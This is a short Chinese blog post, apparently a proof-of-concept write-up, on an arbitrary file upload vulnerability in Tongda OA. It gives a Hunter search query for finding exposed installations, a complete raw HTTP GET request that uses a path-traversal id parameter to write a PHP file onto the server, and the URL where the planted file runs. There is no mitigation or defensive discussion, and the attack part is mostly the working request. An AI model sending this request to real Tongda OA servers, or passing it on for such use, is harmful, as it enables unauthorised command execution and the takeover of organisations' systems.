Babing
Published on 2024-08-30 / 1 Visits
0
0

T10-10通达-OA-文件上传

T10-10通达-OA-文件上传

漏洞描述:

通达OA api.ali.php存在任意文件上传漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限。

网站图片:

image-20240625142731323

网络测绘:

Hunter 语法:

app.name=“通达 OA”

漏洞复现:

image.png

发起get请求写入文件,其中2309代表着其创建日期,23年9月,上传文件成功后,即可出现”+ok"提示。

GET /inc/package/work.php?id=././/myoa/attach/approve_center/2309/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4  HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.31.164

image.png

上传文件位置,成功输出vuln_test字符

http://xx.xx.xx.xx/fb6790f4.php

image.png


Comment